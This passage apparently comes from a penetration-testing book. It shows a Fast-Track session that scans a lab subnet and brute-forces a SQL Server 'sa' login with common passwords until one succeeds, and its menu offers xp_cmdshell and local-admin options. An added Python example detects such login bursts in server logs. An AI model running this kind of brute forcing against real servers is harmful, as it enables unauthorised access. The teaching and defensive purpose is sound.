
Chapter 11

You can use and customize several options to reach your target, the easiest of which is the quick brute force, which will often go undetected. We’ll select the quick brute force option using a subset of built-in passwords and attempt to guess the password on the MS SQL server.

Enter the IP Address and Port Number to Attack.

 

Options: (a)ttempt SQL Ping and Auto Quick Brute Force

           (m)ass scan and dictionary brute
           (s)ingle Target (Attack a Single Target with big dictionary)
           (f)ind SQL Ports (SQL Ping)
           (i) want a command prompt and know which system is vulnerable
           (v)ulnerable system, I want to add a local admin on the box...
           (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)

  Enter Option: a

 Enter username for SQL database (example:sa): sa

Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...

 Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 10.211.55.1/24

Do you want to perform advanced SQL server identification on non-standard SQL 
ports? This will use UDP footprinting in order to determine where the SQL 
servers are at. This could take quite a long time.

 Do you want to perform advanced identification, yes or no: yes

[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 10.211.55.128:1433
Brute forcing password of  on IP 10.211.55.128:1433
Brute forcing password of password on IP 10.211.55.128:1433

SQL Server Compromised: "sa" with password of: "password" on IP 10.211.55.128:1433

Brute forcing password of sqlserver on IP 10.211.55.128:1433
Brute forcing password of sql on IP 10.211.55.128:1433
Brute forcing password of password1 on IP 10.211.55.128:1433
Brute forcing password of password123 on IP 10.211.55.128:1433
Brute forcing password of complexpassword on IP 10.211.55.128:1433
Brute forcing password of database on IP 10.211.55.128:1433
Brute forcing password of server on IP 10.211.55.128:1433
Brute forcing password of changeme on IP 10.211.55.128:1433
Brute forcing password of change on IP 10.211.55.128:1433
Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433
Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433
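
From the defender's side, a run like the one above appears in the SQL Server error log as a burst of failed sa logins from one client, with a success in the middle of the burst. The following added example (not from the book or from Fast-Track) scans a constructed ERRORLOG excerpt for that pattern; the log lines, client addresses, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches "Login failed/succeeded" entries in a SQL Server ERRORLOG.
# Success entries exist only if login auditing records successful logins too.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)

def _line(sec, ok, user, client):
    """Build one constructed ERRORLOG entry (sample data, not from the page)."""
    detail = ("Login succeeded for user '%s'. Connection made using SQL Server authentication."
              if ok else
              "Login failed for user '%s'. Reason: Password did not match that for the login provided.")
    return "2011-06-01 10:15:%02d.00 Logon       %s [CLIENT: %s]" % (sec, detail % user, client)

# Constructed sample: guesses against sa continue after one of them succeeds,
# as in the transcript above. Both client addresses are made up.
SAMPLE_LOG = "\n".join([
    _line(1, False, "sa", "10.211.55.130"), _line(2, False, "sa", "10.211.55.130"),
    _line(3, True, "sa", "10.211.55.130"), _line(4, False, "sa", "10.211.55.130"),
    _line(5, False, "sa", "10.211.55.130"), _line(9, False, "app", "10.211.55.20"),
])

def find_bruteforce(log_text, threshold=3, window=timedelta(seconds=60)):
    """Map (client, login) to the size of its largest failure burst and whether
    a successful login from the same client occurred during the guessing."""
    events = defaultdict(list)  # (client, login) -> [(timestamp, result)]
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events[(m["client"], m["user"])].append((ts, m["result"]))
    alerts = {}
    for key, evs in events.items():
        fails = sorted(t for t, r in evs if r == "failed")
        # Largest number of failures that fall inside any single window.
        burst = max((sum(1 for t in fails if start <= t <= start + window)
                     for start in fails), default=0)
        if burst >= threshold:
            hit = any(r == "succeeded" and fails[0] <= t <= fails[-1] + window
                      for t, r in evs)
            alerts[key] = {"failures": burst, "compromised": hit}
    return alerts
```

An alert with `compromised` set to true means a guess worked, so the login's password should be treated as known to the client that produced the burst.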